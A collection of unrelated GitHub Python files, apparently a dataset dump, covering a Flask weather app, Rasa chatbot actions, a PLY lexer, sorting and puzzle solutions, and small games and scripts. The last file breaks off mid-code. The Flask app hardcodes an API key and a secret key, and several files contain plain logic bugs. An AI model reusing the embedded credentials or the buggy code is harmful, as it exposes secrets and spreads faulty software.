weight from other workers...\")\n # model = init_model(cfg.model_name, cfg.model_args)\n sub_models = weight_sync()\n\n is_checkpoint = get_is_checkpoint()\n \n for i in range(get_worker_num()):\n sub_models[i].eval()\n if is_checkpoint:\n save_path = \"./model_state/sub_model_{}_epoch_{}_{}.pkl\".format(i, epoch, math.floor(time.time()))\n torch.save(sub_models[i].state_dict(), save_path)\n \n correct, total = 0, 0\n loss, counter = 0, 0\n criterion = nn.CrossEntropyLoss()\n\n print(\"Start test evaluation...\")\n with torch.no_grad():\n for (images, labels) in test_dataloader:\n if cfg.data.name == 'MNIST':\n images = images.repeat(1, 3, 1, 1) \n x = images\n for i in range(get_worker_num()):\n x = sub_models[i](x)\n \n outputs = x\n _, predicted = torch.max(outputs.data, 1)\n\n total 
+= labels.size(0)\n correct += (predicted == labels).sum().item()\n loss += criterion(outputs, labels).item()\n counter += 1\n\n del sub_models # before deletion, weight should be stored ?\n return loss / counter, correct / total * 100","repo_name":"qyy2003/FTPipeHD","sub_path":"utils/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73036421954","text":"import cv2\nimport matplotlib.pyplot as plt\n\n# Ler uma imagem rgb\nimage = cv2.imread('car.jpg')\n\n# Transformando para escala de cinza\ngrayscale_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Equalizar a imagem\nequalized_image = cv2.equalizeHist(grayscale_image)\n\n# Calcular histogramas da imagem original e da imagem equalizada usando apenas openCV\noriginal_hist = cv2.calcHist(grayscale_image, channels=[0], mask=None, histSize=[256], ranges=[0, 256])\nequalized_hist = cv2.calcHist(equalized_image, channels=[0], mask=None, histSize=[256], ranges=[0, 256])\n\n# Mostrar a imagem original, a imagem equalizada e seus histogramas\n# Em python, podemos calcular e mostrar os histogramas usando apenas matplotlib\nplt.figure(1)\nplt.subplot(221)\nplt.imshow(grayscale_image, cmap='gray')\nplt.subplot(222)\nplt.hist(grayscale_image.ravel(), 256, [0, 256])\nplt.subplot(223)\nplt.imshow(equalized_image, cmap='gray')\nplt.subplot(224)\nplt.hist(equalized_image.ravel(), 256, [0, 256])\nplt.show()\n","repo_name":"danielbragga/LapiscoTraining--IC","sub_path":"Questions/16/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25129623888","text":"from flask import Flask, render_template, url_for, request, flash\r\nimport sqlite3\r\nimport requests, json\r\n\r\napp = Flask(__name__)\r\napp.secret_key = 'This_is_very_secret'\r\n\r\n@app.route('/', methods = ['GET', 'POST'])\r\ndef main():\r\n print(request.method)\r\n if request.method == 'POST':\r\n api_key = \"73c61ac872812494ce058fca44377691\"\r\n base_url = \"http://api.openweathermap.org/data/2.5/weather?\"\r\n city_name = request.form['City']\r\n complete_url = base_url + \"appid=\" + api_key + \"&q=\" + city_name\r\n response = requests.get(complete_url)\r\n\r\n x = response.json()\r\n\r\n if x[\"cod\"] != \"404\":\r\n\r\n y = x[\"main\"]\r\n\r\n current_temperature = y[\"temp\"]\r\n current_pressure = y[\"pressure\"]\r\n current_humidity = y[\"humidity\"]\r\n\r\n z = x[\"weather\"]\r\n\r\n weather_description = z[0][\"description\"]\r\n\r\n \r\n flash(\" Temperature (in kelvin unit) = \" +\r\n str(current_temperature) +\r\n \"\\n atmospheric pressure (in hPa unit) = \" +\r\n str(current_pressure) +\r\n \"\\n humidity (in percentage) = \" +\r\n str(current_humidity) +\r\n \"\\n description = \" +\r\n str(weather_description))\r\n \r\n message = [current_temperature, current_pressure, current_humidity, weather_description]\r\n \r\n else:\r\n print(\" City Not Found \")\r\n \r\n return render_template('home.html', message = message)\r\n\r\nif __name__ == '__main__': \r\n app.run(debug = True)","repo_name":"Br0atmeal/Help","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8215345045","text":"\"\"\"Tests `random.randint` python2 and python3 compatibility.\n\"\"\"\nfrom subprocess import 
Popen\nfrom subprocess import PIPE\nimport os\n\nMAIN_FILE = os.path.dirname(os.path.realpath(__file__)).replace(\"test\", \"__main__\")\n\n\ndef test_randint_compability():\n \"\"\"Tests if initegers generated by python 2 and python 3 randint are the same.\n\n Generate several random integers for several seeds and compares them.\n \"\"\"\n n_int = 100\n os.environ[\"PYTHONHASHSEED\"] = \"0\"\n\n for seed_init in [\"1a.500\", \"2e.305\", \"1e.500\"]:\n for low in [0, 10, 100]:\n for width in [5, 10, 100]:\n high = low + width\n args = [\n MAIN_FILE,\n seed_init,\n \"-n\",\n str(n_int),\n \"--low\",\n str(low),\n \"--high\",\n str(high),\n ]\n print(*args)\n p = Popen([\"python2\"] + args, stdin=PIPE, stdout=PIPE, stderr=PIPE)\n py2_rands, _ = p.communicate()\n p = Popen([\"python3\"] + args, stdin=PIPE, stdout=PIPE, stderr=PIPE)\n py3_rands, _ = p.communicate()\n\n assert py2_rands == py3_rands\n print(py2_rands)\n","repo_name":"callat-qcd/nucleon_elastic_FF","sub_path":"scripts/random_patch/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33892949741","text":"import torch\n\n\n# pos_preds is (N_actors, N_modes, T, 2)\n# probs is (N_modes)\n# GT is (N_actors, T, 2)\ndef multi_mode_loss_L2(pos_preds, probs, GT):\n pred_size = list(pos_preds.size())\n T = pred_size[2]\n \n GT = GT[:,None,:,:]\n \n # shape (N_actors, N_modes, T, 2)\n sq_dif = torch.square(pos_preds - GT)\n # shape (N_actors, N_modes, T)\n L2_per_timestep = torch.sqrt(torch.sum(sq_dif, 3))\n # shape (N_actors, N_modes)\n ADE_per_actor_per_mode_per_ten = torch.sum(L2_per_timestep[:, :, range(0, T, 10)], 2) / T * 10\n ADE_per_actor_per_mode = torch.sum(L2_per_timestep, 2) / T\n # shape (N_modes)\n ADE_per_mode = torch.sum(ADE_per_actor_per_mode, 0)\n # shape (,)\n best_mode = torch.argmin(ADE_per_mode, 0).type(torch.LongTensor).cuda()\n min_ADE = torch.index_select(ADE_per_mode, 0, best_mode)\n min_ADE_prob = torch.index_select(probs, 0, best_mode)\n min_ADE_CrossEnt = -1*torch.log(min_ADE_prob+1e-5)\n \n return min_ADE, min_ADE_CrossEnt\n","repo_name":"SambaranRepo/VectorNet_Waymo","sub_path":"utils/MTP_loss.py","file_name":"MTP_loss.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"61"} +{"seq_id":"23257074472","text":"#Escribe una función que pueda decirte si un año (número entero) es bisiesto o no:\n\naño = int(input('Por favor, ingrese el año a consultar:\\n'))\n\ndef bisiesto(año):\n if año % 4 == 0 and año % 100 != 0:\n return True\n \n elif año % 100 == 0 and año % 400 == 0:\n return True\n else:\n False\n \nprint(bisiesto(año))","repo_name":"Franjas/Curso-python","sub_path":"ejercicios12.py","file_name":"ejercicios12.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17293231427","text":"import math\n\n#constants\nsecondsDay = 86400\nspeed_of_light = 299792458\nulaCharge = 14830\nspaceXInsurance = 0.3\nspaceXCharge = 2720\nlightYear = 9460730472580800\n\nchoice = 0\n\nwhile choice != 4:\n\n #prompt user\n print('Main menu: \\n1. Warp speed \\n2. Cost to Launch \\n' \\\n '3. Time Dilation \\n4. 
Quit \\n')\n\n choice = int(input('Please choose an option: '))\n\n #validate\n while choice < 1 or choice > 4:\n choice = int(input('Please choose an option: '))\n\n #choice number 1\n #input and validation\n if choice == 1:\n ship_speed = float(input(\"Please input ship's speed in \" \\\n \"units of warp factor: \"))\n while ship_speed < 0:\n ship_speed = float(input(\"Please input ship's speed in \" \\\n \"units of warp factor: \"))\n ship_speed = (((ship_speed ** 10) ** (1/3)) * speed_of_light)\n\n #print results\n print('You are now traveling at',format(ship_speed, ',.2f'), \\\n 'meters per second.')\n\n #choice number 2 \n elif choice == 2:\n satellite_mass = float(input(\"Please enter satellite's mass in kilograms: \"))\n while satellite_mass < 1:\n satellite_mass = float(input(\"Please enter satellite's mass in \" \\\n \"kilograms: \"))\n satellite_manufacture = float(input(\"Please enter satellite's manufacture \" \\\n \"cost in US dollars: \"))\n while satellite_manufacture < 1:\n satellite_manufacture = float(input(\"Please enter satellite's \" \\\n \"manufacture cost in US dollars: \"))\n\n #calculate costs\n ulaCost = satellite_mass * ulaCharge\n spaceInsurance = satellite_manufacture * spaceXInsurance\n spaceXCost = ((satellite_mass * spaceXCharge) + spaceInsurance)\n\n #print results\n if ulaCost < spaceXCost:\n savings = spaceXCost - ulaCost\n print('United Launch Alliance will save you $',format(savings, ',.2f'), \\\n ' on this launch.', sep = '')\n elif spaceXCost < ulaCost:\n savings = ulaCost - spaceXCost\n print('SpaceX will save you $',format(savings, ',.2f'),' on this launch.', sep = '')\n else:\n print('Both providers cost the same amount')\n\n #choice number 3\n elif choice == 3:\n travel_distance = float(input('Enter travel distance in light years: '))\n while travel_distance < 1 and travel_distance > 0:\n travel_distance = float(input('Enter travel distance in light years: '))\n ship_velocity = float(input('Enter space ship velocity as a fraction of ' \\\n 'the speed of light: '))\n while ship_velocity < 0.1 or ship_velocity == 1.0 or ship_velocity > 1.0:\n ship_velocity = float(input('Enter space ship velocity as a fraction of ' \\\n 'the speed of light: '))\n\n #calculate time dilation on earth\n distance = travel_distance * lightYear\n speed = ship_velocity * speed_of_light\n time = distance / speed\n time = time / secondsDay\n\n #calculate time dilation on ship\n shipTime = (distance / speed) // secondsDay\n time_dilation = (math.sqrt(1 - ((speed ** 2) / (speed_of_light ** 2)))) * shipTime\n\n #print results\n time = format(time, ',.0f')\n time = int(time)\n if time >= 365:\n years = time // 365\n days = time - 365\n print('An observer on Earth ages',years,'years,',days,'days during the trip')\n else:\n print('An observer on Earth ages',time,'days during the trip')\n\n if time_dilation >= 365:\n shipYears = time_dilation // 365\n shipDays = time_dilation - 365\n print('A passenger on the ship ages',shipYears,'years,',shipDays,'days during the trip')\n else:\n time_dilation = math.floor(time_dilation)\n print('A passenger on the ship ages',time_dilation,'days during the trip')\n print()\n\nprint('Goodbye')\n\n \n\n\n \n\n \n","repo_name":"Pengyuuu/CECS-174","sub_path":"Homework/Homework 1/TruongHW1.py","file_name":"TruongHW1.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21879129973","text":"'''\nAndrea Sheets\n2020_9_21\nMyUtilies\nDie 
Roller\n'''\n\nimport random\nimport os\n\ndef DieRoller(times, sides):\n # rolls any amount of dice (times) with any amount of sides (sides) and returns the sum of all die rolled, using an accumulator (total)\n total = 0\n for i in range(times):\n roll = random.randint(1, sides)\n total += roll\n print(roll) #Had this for testing purposes - can comment back in to see the numbers rolled for each iteration\n return total\n\ndef TargetRoller(times, sides, target):\n # rolls any amount of dice (times) with any amount of sides (sides) and returns how many times a roll was either equal to or greater than a target number (target)\n total = 0\n for i in range(times):\n roll = random.randint(1, sides)\n print(roll) #Had this for testing purposes = can comment back in to see the numbers rolled for each iteration\n if roll >= target:\n total += 1\n return total\n\n\n ","repo_name":"NicciSheets/Game_0_aka_Dice_Roller","sub_path":"MyUtilities.py","file_name":"MyUtilities.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39798987438","text":"\"\"\"Settings for pelican.\"\"\"\n\n# This can also be the absolute path to a theme that you downloaded\n# i.e. './themes/anothertheme/'\nTHEME = 'notmyidea'\n\n# The folder ``images`` should be copied into the folder ``static`` when\n# generating the output.\nSTATIC_PATHS = ['images', ]\n\n# See http://pelican.notmyidea.org/en/latest/settings.html#timezone\nTIMEZONE = 'UTC'\n\n# Pelican will take the ``Date`` metadata and put the articles into folders\n# like ``/posts/2012/02/`` when generating the output.\nARTICLE_PERMALINK_STRUCTURE = '/%Y/%m/'\n\n# I like to put everything into the category ``Blog``, which also appears on\n# the main menu. 
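Because every roll is at least 1 and at most sides, the two dice helpers above have edges that can be checked without seeding the generator — a target of 1 always hits and a target above sides never does (note both functions also print each roll):

assert TargetRoller(100, 6, 1) == 100   # every d6 roll is >= 1
assert TargetRoller(100, 6, 7) == 0     # no d6 roll reaches 7
assert 100 <= DieRoller(100, 6) <= 600  # sum of 100d6 is bounded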
Tags will not appear on the menu.\nDEFAULT_CATEGORY = 'Blog'\n\nAUTHOR = 'Nhan C'\nSITENAME = 'nhanc.github.io'\nSITEURL = \"http://nhanc.github.io\"\n\n# I like to have ``Archives`` in the main menu.\nMENUITEMS = (\n ('Archives', '{0}/archives.html'.format(SITEURL)),\n)\n\n\nWITH_PAGINATION = True\nDEFAULT_PAGINATION = 10\nREVERSE_ARCHIVE_ORDER = True\n\n# Uncomment what ever you want to use\n#GOOGLE_ANALYTICS = 'XX-XXXXXXX-XX'\n#DISQUS_SITENAME = 'yourdisqushandle'\n#GITHUB_URL = 'http://github.com/username/username.github.com'\n#TWITTER_USERNAME = 'username'\n","repo_name":"nhanc/nhanc.github.io","sub_path":"source/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16951464369","text":"from typing import Any, Text, Dict, List\nfrom rasa_sdk.events import AllSlotsReset,SlotSet\nfrom rasa_sdk import Action, Tracker,events,FormValidationAction\nfrom rasa_sdk.executor import CollectingDispatcher\nfrom typing import Dict, Text, Any, List, Union, Optional\nimport json\nfrom rasa_sdk.types import DomainDict\nimport re\nimport requests\n\n\n## Below is the action for reseting all slots which are previously filled.\n\nclass ActionAllSlotReset(Action):\n\n def name(self) -> Text:\n return \"action_all_slot_reset\"\n\n def run(self, dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n\n return [AllSlotsReset()]\n\n## Below action validate that the entered country for checking capital is available in country list or not if country is not available in country list then it shows the alert message.\n\nclass ValidateCapitalForm(FormValidationAction):\n def name(self) -> Text:\n return \"validate_capital_form\"\n\n def validate_countryname(self, value: Text, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any]) -> Optional[Text]:\n \tcountr_name = tracker.get_slot('countryname')\n \tURL ='https://qcooc59re3.execute-api.us-east-1.amazonaws.com/dev/getCountries'\n \tcountr_name = tracker.get_slot('countryname')\n \tresp_check_countries = requests.get(url=URL)\n \tcheck_countries = resp_check_countries.json()\n \tcheck_cntr_list = check_countries[\"body\"]\n \tif (countr_name in check_cntr_list):\n \t\treturn {\"countryname\" : value}\n \telse :\n \t\tdispatcher.utter_message(text=\"It seems that you have entered wrong country name\")\n \t\treturn{\"countryname\" : None}\n\n## Below action validate that the entered country for checking population is available in country list or not if country is not available in country list then it shows the alert message.\n\nclass ValidatePopulationForm(FormValidationAction):\n def name(self) -> Text:\n return \"validate_population_form\"\n\n def validate_countryname(self, value: Text, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any]) -> Optional[Text]:\n \tURL ='https://qcooc59re3.execute-api.us-east-1.amazonaws.com/dev/getCountries'\n \tcountry_name = tracker.get_slot('countryname')\n \tresp_check_country = requests.get(url=URL)\n \tcheck_country = resp_check_country.json()\n \tcheck_country_list = check_country[\"body\"]\n \tif (country_name in check_country_list):\n \t\treturn {\"countryname\" : value}\n \telse :\n \t\tdispatcher.utter_message(text=\"It seems that you have entered wrong country name\")\n \t\treturn{\"countryname\" : None}\n\n \n## Action for gettting country list and setting the country list to the countries 
slot.\n\nclass ActionGetCountries(Action):\n\n def name(self) -> Text:\n return \"action_get_countries\"\n\n def run(self, dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n \tURL = 'https://qcooc59re3.execute-api.us-east-1.amazonaws.com/dev/getCountries'\n\n \tresponse_countries = requests.get(url=URL)\n\n \tcountries_data = response_countries.json()\n\n \tcountries_list = countries_data[\"body\"]\n \t\n \treturn [SlotSet('countries',countries_list)]\n\n## Action for fetching the capital of entered country\n\nclass ActionGetCapital(Action):\n\n def name(self) -> Text:\n return \"action_know_capital\"\n\n def run(self, dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n \t url = 'https://qcooc59re3.execute-api.us-east-1.amazonaws.com/dev/getCapital'\n \t capital_countryname = tracker.get_slot('countryname')\n \t payload = {'country': capital_countryname}\n \t headers = {'content-type': 'application/json'}\n \t response_capital = requests.post(url, data= json.dumps(payload), headers=headers)\n \t capital_json = response_capital.json()\n \t if capital_json[\"success\"] ==1 :\n \t \tcountryOne = capital_json[\"body\"][\"country\"]\n \t \tcapital = capital_json[\"body\"][\"capital\"]\n \t \tdispatcher.utter_message(text =\"Capital of\"+\" \"+countryOne+\" \"+\"is\"+\" \"+capital+\" \"+\".\")\n \t else :\n \t \tdispatcher.utter_message(text=\"Sorry we wont be able to found population for\"+population_countryname+ \" \"+\"country\")\n \t return []\n\n## Action for checking the population of country\n\nclass ActionGetPopulation(Action):\n\n def name(self) -> Text:\n return \"action_know_population\"\n\n def run(self, dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n \t url = 'https://qcooc59re3.execute-api.us-east-1.amazonaws.com/dev/getPopulation'\n \t population_countryname = tracker.get_slot('countryname')\n \t payload = {'country': population_countryname}\n \t headers = {'content-type': 'application/json'}\n \t response_population = requests.post(url, data= json.dumps(payload),headers=headers)\n \t population_json = response_population.json()\n \t if population_json[\"success\"] ==1 :\n \t \tcountryTwo = population_json[\"body\"][\"country\"]\n \t \tpopulation = population_json[\"body\"][\"population\"]\n \t \tdispatcher.utter_message(text=\"Population of\"+\" \"+countryTwo+\" \"+\"is\" +\" \"+population +\" \"+\".\")\n \t else:\n \t \tdispatcher.utter_message(text =\"Sorry we wont be able to found population for\"+population_countryname+ \" \"+\"country\")\n \t return []\n\n\n","repo_name":"shivanigaigole/ChatbotAssignment","sub_path":"actions/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":5525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5868699274","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def recoverTree(self, root: Optional[TreeNode]) -> None:\n \"\"\"\n Do not return anything, modify root in-place instead.\n \"\"\"\n nums = []\n\n # print(\"type of root\",type(root))\n def inorder(root):\n if root is None:\n return None\n\n inorder(root.left)\n nums.append(root)\n inorder(root.right)\n\n inorder(root)\n snums = sorted(nums, key=lambda x: x.val)\n n = len(nums)\n for i in 
range(n):\n if nums[i].val != snums[i].val:\n nums[i].val, snums[i].val = snums[i].val, nums[i].val\n break\n\n return root\n\n","repo_name":"vramanrs/Leetcode-python","sub_path":"recover-binary-search-tree.py","file_name":"recover-binary-search-tree.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34957657113","text":"def bubble_sort(items):\n\n '''Return array of items, sorted in ascending order'''\n\n count = 0\n\n for i in range(len(items)-1):\n if items[i] > items[i + 1]:\n items[i],items[i + 1] = items[i + 1],items[i]\n count += 1\n\n if count == 0:\n\n return items\n else:\n\n return bubble_sort(items)\n\n\ndef merge_sort(items):\n\n '''Return array of items, sorted in ascending order'''\n\n\n\ndef quick_sort(items):\n\n '''Return array of items, sorted in ascending order'''\n\n if len(items) <= 1:\n return items\n else:\n return quick_sort([i for i in items[1:] if i <= items[0]]) + [items[0]] +\\\n quick_sort([i for i in items[1:] if i > items[0]])\n","repo_name":"jkroman2/testpackage","sub_path":"testpackage/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43874579470","text":"from agents.runners.learners.learner import Learner\n\nimport ray\n\nclass APEXLearner(Learner):\n def __init__(self, algorithm, writer, device, state_dim, action_dim, agent_args, epsilon):\n self.args = agent_args\n self.algorithm = algorithm(writer, device, state_dim, action_dim, agent_args, epsilon).to(device)\n def run(self, ps, buffer):\n data = ray.get(buffer.sample.remote(self.args['learner_batch_size']))\n idx, td_error = self.algorithm.train_network(data)\n ray.wait([ps.push.remote(self.get_weights())])\n ray.wait([buffer.put_idxs.remote([idx, td_error])])","repo_name":"seolhokim/DistributedRL-Pytorch-Ray","sub_path":"agents/runners/learners/apex_learner.py","file_name":"apex_learner.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"61"} +{"seq_id":"40455909584","text":"import ply.lex as lex\n\n\nclass Lexer:\n\n def __init__(self, data, provenance):\n self.provenance = provenance\n self.data = data\n self.lexer = lex.lex(module=self)\n # Reset the lexer and store a new input string.\n self.lexer.input(self.data)\n self.iseof = False\n\n\n reserved = {\n 'print': 'PRINT',\n 'main': 'MAIN',\n 'def': 'DEF',\n 'var': 'VAR',\n 'int': 'INT'\n }\n\n # all possible token names that can be produced by the lexer\n tokens = ('PLUS',\n 'MINUS',\n 'UMINUS',\n 'TIMES',\n 'DIV',\n 'MODULUS',\n 'BITOR',\n 'BITAND',\n 'BITXOR',\n 'BITSHL',\n 'BITSHR',\n 'BITCOMPL',\n 'EQ',\n 'EOF',\n 'SEMICOLON',\n 'COLON',\n 'LPAREN',\n 'RPAREN',\n 'IDENT',\n 'NUMBER',\n 'LBRACE',\n 'RBRACE') + tuple(reserved.values())\n\n # Regular expression rules for tokens above\n t_LPAREN = r'\\('\n t_RPAREN = r'\\)'\n\n t_PLUS = r'\\+'\n t_MINUS = '-'\n t_UMINUS = '-'\n t_TIMES = r'\\*'\n t_DIV = r'/'\n t_MODULUS = r'%'\n t_BITOR = r'\\|'\n t_BITAND = '&'\n t_BITXOR = r'\\^'\n t_BITSHL = '<<'\n t_BITSHR = '>>'\n t_BITCOMPL = '~'\n\n t_SEMICOLON = ';'\n t_COLON = ':'\n t_EQ = '='\n t_LBRACE = '{'\n t_RBRACE = '}'\n\n def t_IDENT(self, t):\n r'[A-Za-z_][A-Za-z0-9_]*'\n t.type = Lexer.reserved.get(t.value, 'IDENT')\n return t\n\n # regexp rule that matches numbers & converts string into int\n def t_NUMBER(self, t):\n 
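merge_sort above is only a docstring stub; a straightforward implementation in the same style as its neighbours (recursive, returns a new list):

def merge_sort(items):
    '''Return array of items, sorted in ascending order'''
    if len(items) <= 1:
        return items
    mid = len(items) // 2
    left = merge_sort(items[:mid])
    right = merge_sort(items[mid:])
    # merge the two sorted halves
    merged = []
    i = j = 0
    while i < len(left) and j < len(right):
        if left[i] <= right[j]:
            merged.append(left[i])
            i += 1
        else:
            merged.append(right[j])
            j += 1
    return merged + left[i:] + right[j:]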
r'\\d+'\n t.value = int(t.value)\n if 0 <= t.value < 9223372036854775808:\n return t\n self.error(t, f'Integer with value {t.value} must be in [0, 2^63)')\n\n # no return value (token discarded)\n def t_COMMENT(self,t):\n r'//.*\\n?'\n pass\n\n # handle an end-of-file condition in the input\n def t_eof(self, t):\n if not self.iseof:\n self.iseof = True\n t.type = 'EOF'\n return t\n\n # compute column\n def find_column(self, t):\n line_start = self.data.rfind('\\n', 0, t.lexpos) + 1\n return f'{self.provenance}:{t.lineno}.{t.lexpos - line_start + 1}'\n\n def error(self, t, msg):\n print(f'{self.find_column(t)}:Error:{msg}')\n raise SyntaxError(msg)\n\n # handleillegalcharactersintheinput.\n def t_error(self, t):\n self.error(t, f\"Illegal character '{t.value[0]}'\")\n\n # rule to track line numbers\n def t_newline(self, t):\n r'\\n'\n t.lexer.lineno += 1\n\n def t_whitespace(self, t):\n r'//.*\\n?'\n if t.value[-1] == '\\n':\n t.lexer.lineno += 1\n # returns nothing\n\n # string containing ignored characters (spaces and tabs)\n t_ignore = ' \\t\\f\\v'\n","repo_name":"daryatodoskova/cse302labs","sub_path":"2/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35189954887","text":"'''\nClimbing Staris:\nYou are climbing a staircase. It takes n steps to reach the top.\n\nEach time you can either climb 1 or 2 steps. In how many distinct ways can you climb to the top?\n\nExample 1:\n\nInput: n = 2\nOutput: 2\nExplanation: There are two ways to climb to the top.\n1. 1 step + 1 step\n2. 2 steps\nExample 2:\n\nInput: n = 3\nOutput: 3\nExplanation: There are three ways to climb to the top.\n1. 1 step + 1 step + 1 step\n2. 1 step + 2 steps\n3. 
2 steps + 1 step\n'''\n\n# Brute Force Solution\nclass Solution:\n def climbStairs(self, n: int) -> int:\n def countClimbStairs(i, n):\n if i > n:\n return 0\n if i == n:\n return 1\n \n return countClimbStairs(i+1, n) + countClimbStairs(i+2, n)\n \n return countClimbStairs(0, n)\n\nclass Solution:\n def climbStairs(self, n: int) -> int:\n lPoint, rPoint = 0, 1\n for i in range(n+1):\n temp = lPoint\n lPoint = lPoint + rPoint\n rPoint = temp\n return lPoint\n\n\nclass Solution:\n def climbStairs(self, n: int) -> int:\n c1 = 1\n c2 = 1\n for i in range(n-1):\n next = c1 + c2\n c1= c2\n c2 = next\n return c2\n\n\n\n \n ","repo_name":"sushant097/Data-Structure-Algorithms-Collections-Python","sub_path":"coding_solutions/interview_related/[DP]ClimbingStairs.py","file_name":"[DP]ClimbingStairs.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6556564488","text":"#class\nclass Person:\n def walk(self):#instance keyword\n print('person is walking')\n def read(self):\n print(\"person is reading\")\n#object creation->Person(),reference pe1\npe1=Person()\npe1.walk()\npe1.read()\n#object2\npe2=Person()\npe2.walk()\npe2.read()","repo_name":"silpaps/mypython","sub_path":"OOPS/creating_class_object.py","file_name":"creating_class_object.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23554817181","text":"def boilerplate(filename):\n with open(filename, 'r') as infi:\n with open('output-'+filename, 'w') as outfi:\n numcases = infi.readline().strip()\n numcases = int(numcases)\n for i in range(numcases):\n case = infi.readline().strip()\n outfi.write(f(i, case)+'\\n')\n\ndef tester(x):\n return f(x, x)\n\ndef tidynumbers(casenumber, inp):\n def helper(x):\n x = str(x)\n if x == '0':\n return '0'\n biggest, bigindex = 0, -1\n sofar = '0'\n for i in range(len(x)):\n if int(x[i]) < biggest:\n sofar = helper(int(sofar) - 1)\n sofar += '9' * (len(x) - i)\n return sofar\n else:\n sofar += x[i]\n biggest, bigindex = int(x[i]), i\n return sofar\n\n return 'Case #%s: %s' % (casenumber+1, int(helper(inp)))\n\n\nf = tidynumbers\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/2175.py","file_name":"2175.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37429175315","text":"\"\"\"\nThis module implements all sort of things related to weapons. There are simple\nweapons, guns and bullets. There are variations of them for enemys, but the main\nidea remains the same for all the clases.\n\"\"\"\nfrom utils import load_image\nfrom settings import SHOOT_SOUND\n\nimport pygame\n\nimport math\nfrom types import FunctionType\n\nclass Weapon(pygame.sprite.Sprite):\n \"\"\"\n Class representing a generic weapon in the game. 
This class is responsible\n for implementing the weapon rotation based on the target position.\n\n Parameters\n ----------\n image_path: tuple\n The path leading to the weapon image\n target_pos: tuple\n The initial position to target.\n \"\"\"\n def __init__(self, image_path: tuple, target_pos: tuple):\n super().__init__()\n self._target_pos = target_pos\n self.image = load_image(image_path, 3)\n self.image_left = pygame.transform.flip(self.image, False, True)\n self.orig_image = self.image\n self.inventory_image = self.image\n self.rect = self.image.get_rect()\n self.facing_r = True\n self.angle_radians = 0\n self.angle_degrees = 0\n self._entity = None\n\n @property\n def entity(self):\n \"\"\"\n The entity associated with the weapon. The weapon will orbit this entity.\n \"\"\"\n return self._entity\n\n @entity.setter\n def entity(self, entity):\n self._entity = entity\n self.rect.center = self._entity.rect.center\n\n self.entity_image_rigth = self._entity.image\n self.entity_image_left = pygame.transform.flip(self._entity.image, True, False)\n\n def update_target_position(self, target_pos: tuple):\n \"\"\"\n Updates the position that the weapon should target.\n\n Parameters\n ----------\n target_pos:\n The new position to target.\n\n Returns\n -------\n None\n \"\"\"\n self._target_pos = target_pos\n\n def _get_angles(self):\n self.angle_radians = math.atan2(self.entity.rect.centery-self._target_pos[1], self._target_pos[0]-self.entity.rect.centerx)\n self.angle_degrees = math.degrees(self.angle_radians)\n\n def _rotate(self):\n\n self.rect = self.image.get_rect(\n center = (math.cos(-self.angle_radians) * 65 + self.entity.rect.centerx,\n math.sin(-self.angle_radians) * 80 + self.entity.rect.centery)\n )\n\n if -self.angle_degrees >= 90 or -self.angle_degrees <= -90:\n self.image = pygame.transform.rotate(self.image_left, self.angle_degrees)\n self.entity.image = self.entity_image_left\n self.facing_r = False\n \n else:\n self.image = pygame.transform.rotate(self.orig_image, 